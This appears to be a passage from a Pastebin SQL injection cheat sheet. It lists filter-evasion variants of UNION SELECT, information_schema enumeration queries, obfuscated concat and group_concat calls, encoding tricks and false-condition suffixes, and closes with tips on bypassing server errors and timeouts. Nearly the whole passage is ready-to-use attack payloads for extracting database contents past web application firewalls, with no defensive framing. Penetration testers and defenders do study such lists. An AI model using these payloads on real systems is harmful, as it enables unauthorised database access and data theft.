  635. UNION/*&test=1*/SELECT/*&pwn=2*/
  636. un?<ion sel="">+un/**/ion+se/**/lect+
  637. +UNunionION+SEselectLECT+
  638. +uni%0bon+se%0blect+
  639. %252f%252a*/union%252f%252a /select%252f%252a*/
  640. /%2A%2A/union/%2A%2A/select/%2A%2A/
  641. %2f**%2funion%2f**%2fselect%2f**%2f
  642. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  643. /*!UnIoN*/SeLecT+
  644. [~] information_schema.tables [~]
  645. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
  646. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
  647. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
  648. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
  649. /*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
  650. /*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table
  651. [~] concat() [~]
  652. CoNcAt()
  653. concat()
  654. CON%08CAT()
  655. CoNcAt()
  656. %0AcOnCat()
  657. /**//*!12345cOnCat*/
  658. /*!50000cOnCat*/(/*!*/)
  659. unhex(hex(concat(table_name)))
  660. unhex(hex(/*!12345concat*/(table_name)))
  661. unhex(hex(/*!50000concat*/(table_name)))
  662. [~] group_concat() [~]
  663. /*!group_concat*/()
  664. gRoUp_cOnCAt()
  665. group_concat(/*!*/)
  666. group_concat(/*!12345table_name*/)
  667. group_concat(/*!50000table_name*/)
  668. /*!group_concat*/(/*!12345table_name*/)
  669. /*!group_concat*/(/*!50000table_name*/)
  670. /*!12345group_concat*/(/*!12345table_name*/)
  671. /*!50000group_concat*/(/*!50000table_name*/)
  672. /*!GrOuP_ConCaT*/()
  673. /*!12345GroUP_ConCat*/()
  674. /*!50000gRouP_cOnCaT*/()
  675. /*!50000Gr%6fuP_c%6fnCAT*/()
  676. unhex(hex(group_concat(table_name)))
  677. unhex(hex(/*!group_concat*/(/*!table_name*/)))
  678. unhex(hex(/*!12345group_concat*/(table_name)))
  679. unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
  680. unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
  681. unhex(hex(/*!50000group_concat*/(table_name)))
  682. unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
  683. unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
  684. convert(group_concat(table_name)+using+ascii)
  685. convert(group_concat(/*!table_name*/)+using+ascii)
  686. convert(group_concat(/*!12345table_name*/)+using+ascii)
  687. convert(group_concat(/*!50000table_name*/)+using+ascii)
  688. CONVERT(group_concat(table_name)+USING+latin1)
  689. CONVERT(group_concat(table_name)+USING+latin2)
  690. CONVERT(group_concat(table_name)+USING+latin3)
  691. CONVERT(group_concat(table_name)+USING+latin4)
  692. CONVERT(group_concat(table_name)+USING+latin5)
  693. [~] after id no. like id=1 +/*!and*/+1=0 [~]
  694. +div+0
  695. Having+1=0
  696. +AND+1=0
  697. +/*!and*/+1=0
  698. and(1)=(0)
  699. when the --+- or -- dosen't work use ;%00
  700. bypass error 505
  701. sometimes when union select ,sites become 505 or time out....
  702. bypass-
  703. -use brackets
  704. union(select+1)
  705. -use %0b or /**/ as space
  706. union%0bselect
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!